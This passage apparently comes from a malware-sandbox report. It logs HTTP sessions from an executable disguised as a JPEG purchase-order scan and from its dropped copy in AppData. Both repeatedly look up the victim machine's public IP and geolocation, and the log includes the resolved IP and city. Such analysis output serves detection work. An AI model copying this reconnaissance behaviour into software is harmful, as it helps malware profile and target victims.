                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 25, 2024 09:18:16.714617014 CEST  323                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: abb033c40778d6d7ece2c328e6e533af
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.4  49765        193.122.130.0   80                1260  C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 25, 2024 09:18:16.726078033 CEST  151                OUT        GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 25, 2024 09:18:17.449722052 CEST  323                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 4b6e335968c531c049a61631886a66f7
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.4  49769        193.122.130.0   80                7448  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 25, 2024 09:18:17.481931925 CEST  151                OUT        GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 25, 2024 09:18:18.420723915 CEST  323                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:18 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: eed0fa300fcbe57f4b990cab13ad51f4
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.4  49773        193.122.130.0   80                7448  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 25, 2024 09:18:19.189542055 CEST  151                OUT        GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 25, 2024 09:18:20.888344049 CEST  323                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: c9a8748790eaa82f68bd2f81f127d51c
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.4  49776        193.122.130.0   80                7448  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 25, 2024 09:18:21.701718092 CEST  151                OUT        GET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
Oct 25, 2024 09:18:22.365217924 CEST  323                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 94bc4edb684db190d7bd60977225c905
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49736        188.114.97.3    443               1260  C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-25 07:18:05 UTC  87                 OUT        GET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
2024-10-25 07:18:05 UTC  894                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:05 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 361
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkou9CPsSDqOzSwNo0QBSnLV0rCmAAeQQ%2BC7YRLce53SImoVS%2BL0l1NgMsJyyszTgcUPeUE2B8yd4uBq7K13igCv36AuzJNUcvYNf2nB%2Btp4AbF%2FbwqGl0wV13odVLchFEkSeYd9"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e3c4c9346c8-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1133&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2490111&cwnd=251&unsent_bytes=0&cid=d7f0d202dd561c92&ts=278&x=0"
2024-10-25 07:18:05 UTC  366                IN         Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:05 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49738        188.114.97.3    443               1260  C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-25 07:18:06 UTC  63                 OUT        GET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
2024-10-25 07:18:06 UTC  894                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:06 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 362
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PUjg61Pr8aN9bZMghMGzqhRT7HliVNvHL3SCPaCXHs%2Bgsz5L9q4d02u7hN%2BCJIPKw43hGZpVHJVSG7Qv4bqInlMmlXB%2FSgWWCUZu6oyXjz1aYJusNkZ1mybdi%2FzsSzRmMbuG02o"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e423a486c26-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1026&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2688950&cwnd=250&unsent_bytes=0&cid=f4fae749c5754526&ts=150&x=0"
2024-10-25 07:18:06 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 07:18:07 UTC | 87 | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-25 07:18:07 UTC | 894 | IN | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:07 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 363
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Weq%2FzXkPfawjjt7rwuggoHkSNDs5PgUg30iKqCRA7TDKzFd%2BoaILfIx55d2zEpk9NPIDD4mcPHn%2B5t1PN52yXPESpCkkXs292kDcU7t%2BSgyvwVWxr3IJDEJNG9IkBqdB6QcSCMm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e4b6ae3e909-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2153159&cwnd=247&unsent_bytes=0&cid=f384f482924f8fb3&ts=149&x=0"
2024-10-25 07:18:07 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49745 | 188.114.97.3 | 443 | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 07:18:09 UTC | 63 | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-25 07:18:09 UTC | 888 | IN | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:09 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 365
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yqNRhXLPpeX3RkeriO1aV%2BowLjpKAnDwSJdX85s2PlNVG6mJHj31RyCijYau8ASBJWChjP7nwUmo77n4Fop4CdDncHvg6PoN6c4NhsK2ENREroSZG4eMuqHQet40OL3I8vbUyyhk"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e545b9b6c4f-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2175807&cwnd=244&unsent_bytes=0&cid=d64038ccf8ab1812&ts=149&x=0"
2024-10-25 07:18:09 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | 7448 | C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 07:18:09 UTC | 87 | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-25 07:18:09 UTC | 896 | IN | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:09 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 365
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TP4zXZeBAKtNBVHRBNPIi%2B7Br7x1CDiy8yfzpKYuFc8IcYbMY4vUYQytFEuJPKVjnfafK6A15jijkgnE3xRERcxMpxJuX%2BXXYuu62X4UDYjloD%2BLQMmwiYSgiq%2FvUPuL%2BHvjmpTR"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e556861eaac-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1191&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2298412&cwnd=236&unsent_bytes=0&cid=26009a1a2dbc1d23&ts=549&x=0"
2024-10-25 07:18:09 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49747 | 188.114.97.3 | 443 | 7448 | C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 07:18:10 UTC | 63 | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-25 07:18:10 UTC | 890 | IN | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:10 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 366
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnellMpwvDTAd74LG%2FiKfgSyTUtY0KiaqxtDByBNj8OnVpeSUBnKi3Kh4o%2FZKFc0183id6LTc2RXSCbfL88vlpUZrorrss3ZD8LBUwMaNoBUsFO3kmar75Xk06daSP7FCn11tLNn"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e5b4d98a918-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1565&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1790970&cwnd=177&unsent_bytes=0&cid=0b8b596208c61290&ts=146&x=0"
2024-10-25 07:18:10 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49748 | 188.114.97.3 | 443 | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 07:18:10 UTC | 63 | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-25 07:18:10 UTC | 896 | IN | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:10 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 366
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eTNNCKM0eqTg3uiRFos1CWJ8bKdR7tz%2F%2Bti3j7Ba%2FOOL2agw9FHBqTBqGK%2BAj6iS8NmYZhuN3UqHPErF08mbp1qr7X2EOfEsTB8djkNssi6VpTxJ2ltcS5U5H%2FcpxQRNB2b21An"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e5dabff45ee-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1761557&cwnd=237&unsent_bytes=0&cid=a4d5c2ef30fcec59&ts=154&x=0"
2024-10-25 07:18:10 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | 7448 | C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 07:18:11 UTC | 63 | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-25 07:18:11 UTC | 898 | IN | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:11 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 367
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nnrw85pfDRrAhuwjhxF3L4ersMmjAQo%2FJfZf6c%2Fu4aiGsEpX4e9%2FR7aP%2F%2FDlua3NBAGnLwYOpH1ZF5QDFAHGWkYP4CFBJzumZmuqm42eoBHHofhrFgD8noqDIPFQDk%2FPlmjGvoWQ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e648ad16b22-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1314571&cwnd=223&unsent_bytes=0&cid=6dbcc1ca65c95c1d&ts=167&x=0"
2024-10-25 07:18:11 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


